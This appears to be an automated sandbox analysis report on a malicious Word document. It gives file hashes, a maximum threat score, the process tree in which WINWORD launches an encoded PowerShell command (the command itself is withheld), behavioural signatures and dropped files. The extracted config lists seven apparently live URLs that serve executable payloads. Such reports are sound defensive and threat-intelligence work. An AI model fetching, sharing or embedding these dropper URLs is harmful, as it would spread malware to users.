Analysis

  • max time kernel
    119s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags
    arch:x64
    arch:x86
    image:win7-20240508-en
    locale:en-us
    os:windows7-x64
    system
  • submitted
    29/05/2024, 01:21

General

  • Target

    sample.doc

  • Size

    157KB

  • MD5

    ea5e4e1ad657db4cce957caff92d4995

  • SHA1

    42fc1e473f121eea1fd3aea54f5fb9f9a15c5157

  • SHA256

    e13fe582fb3f540b7bae68b1aab1cdc1f9e872dffc0f73bc14f04287c66cc813

  • SHA512

    f61d28436026638cc9b740fce172ffbbf61064e0916f2d4aa843f30c4de3be75ff8344128b9bcbb143815dffa005f4092ff0ba0ec3396a7ddbeff3b4291c9e68

  • SSDEEP

    1536:A2Fj72Fjmrdi1Ir77zOH98Wj2gpngh+a9ClJinv:1rfrzOH98ipg4Ynv

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Source
  • URLs (exe.dropper)
    https://case.gonukkad.com/sys-cache/CjT/
    https://starrcoin.net/wp-admin/YT/
    http://modelaw.devkind.com.au/wp-admin/cvDRmGK/
    http://dprkp.palembang.go.id/sys-cache/7Y4aHw/
    http://completeguideblogging.com/euiot/PAuJG/
    http://qutiche.cn/wp-admin/Q/
    https://shiva-engineering.com/1cj/tKemHV7/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\sample.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1868
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
      PID:1604
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -e [base64-encoded command not included on this page]
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2956

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
    Filesize
    70KB
    MD5
    49aebf8cbd62d92ac215b2923fb1b9f5
    SHA1
    1723be06719828dda65ad804298d0431f6aff976
    SHA256
    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
    SHA512
    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
  • C:\Users\Admin\AppData\Local\Temp\Tar3D36.tmp
    Filesize
    181KB
    MD5
    4ea6026cf93ec6338144661bf1202cd1
    SHA1
    a1dec9044f750ad887935a01430bf49322fbdcb7
    SHA256
    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
    SHA512
    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
  • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
    Filesize
    20KB
    MD5
    59d70fab5b57917cd9a7bff0ded5cfcb
    SHA1
    0447fca47bac76ea1af4f59ea5f5ecf800e180ef
    SHA256
    b4b76132192d2e2ed935d55c8bcd16ca8ce3ce48d4748e08f73821486d3c4905
    SHA512
    b6a532f8e1fadced797d937b03820c2083f04014bb33b4814839cfaa43279f42c6fc0f195b3938e56136e1f6746db907e462fb909ef2d81588a1d5dadf0ba47a
  • memory/1868-26-0x00000000003D0000-0x00000000004D0000-memory.dmp
    Filesize
    1024KB
  • memory/1868-25-0x00000000003D0000-0x00000000004D0000-memory.dmp
    Filesize
    1024KB
  • memory/1868-8-0x00000000003D0000-0x00000000004D0000-memory.dmp
    Filesize
    1024KB
  • memory/1868-9-0x00000000003D0000-0x00000000004D0000-memory.dmp
    Filesize
    1024KB
  • memory/1868-17-0x00000000003D0000-0x00000000004D0000-memory.dmp
    Filesize
    1024KB
  • memory/1868-24-0x00000000003D0000-0x00000000004D0000-memory.dmp
    Filesize
    1024KB
  • memory/1868-16-0x00000000003D0000-0x00000000004D0000-memory.dmp
    Filesize
    1024KB
  • memory/1868-14-0x00000000003D0000-0x00000000004D0000-memory.dmp
    Filesize
    1024KB
  • memory/1868-13-0x00000000003D0000-0x00000000004D0000-memory.dmp
    Filesize
    1024KB
  • memory/1868-12-0x00000000003D0000-0x00000000004D0000-memory.dmp
    Filesize
    1024KB
  • memory/1868-11-0x00000000003D0000-0x00000000004D0000-memory.dmp
    Filesize
    1024KB
  • memory/1868-10-0x00000000003D0000-0x00000000004D0000-memory.dmp
    Filesize
    1024KB
  • memory/1868-18-0x00000000003D0000-0x00000000004D0000-memory.dmp
    Filesize
    1024KB
  • memory/1868-22-0x00000000003D0000-0x00000000004D0000-memory.dmp
    Filesize
    1024KB
  • memory/1868-21-0x00000000003D0000-0x00000000004D0000-memory.dmp
    Filesize
    1024KB
  • memory/1868-20-0x00000000003D0000-0x00000000004D0000-memory.dmp
    Filesize
    1024KB
  • memory/1868-19-0x00000000003D0000-0x00000000004D0000-memory.dmp
    Filesize
    1024KB
  • memory/1868-0-0x000000002FEC1000-0x000000002FEC2000-memory.dmp
    Filesize
    4KB
  • memory/1868-7-0x00000000003D0000-0x00000000004D0000-memory.dmp
    Filesize
    1024KB
  • memory/1868-27-0x00000000003D0000-0x00000000004D0000-memory.dmp
    Filesize
    1024KB
  • memory/1868-15-0x00000000003D0000-0x00000000004D0000-memory.dmp
    Filesize
    1024KB
  • memory/1868-23-0x00000000003D0000-0x00000000004D0000-memory.dmp
    Filesize
    1024KB
  • memory/1868-31-0x00000000003D0000-0x00000000004D0000-memory.dmp
    Filesize
    1024KB
  • memory/1868-32-0x00000000003D0000-0x00000000004D0000-memory.dmp
    Filesize
    1024KB
  • memory/1868-30-0x00000000003D0000-0x00000000004D0000-memory.dmp
    Filesize
    1024KB
  • memory/1868-29-0x00000000003D0000-0x00000000004D0000-memory.dmp
    Filesize
    1024KB
  • memory/1868-28-0x00000000003D0000-0x00000000004D0000-memory.dmp
    Filesize
    1024KB
  • memory/1868-33-0x00000000003D0000-0x00000000004D0000-memory.dmp
    Filesize
    1024KB
  • memory/1868-103-0x000000007165D000-0x0000000071668000-memory.dmp
    Filesize
    44KB
  • memory/1868-102-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize
    64KB
  • memory/1868-46-0x000000007165D000-0x0000000071668000-memory.dmp
    Filesize
    44KB
  • memory/1868-6-0x00000000003D0000-0x00000000004D0000-memory.dmp
    Filesize
    1024KB
  • memory/1868-2-0x000000007165D000-0x0000000071668000-memory.dmp
    Filesize
    44KB
  • memory/1868-86-0x00000000003D0000-0x00000000004D0000-memory.dmp
    Filesize
    1024KB
  • memory/1868-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize
    64KB
  • memory/2956-40-0x0000000002070000-0x0000000002078000-memory.dmp
    Filesize
    32KB
  • memory/2956-39-0x000000001B690000-0x000000001B972000-memory.dmp
    Filesize
    2.9MB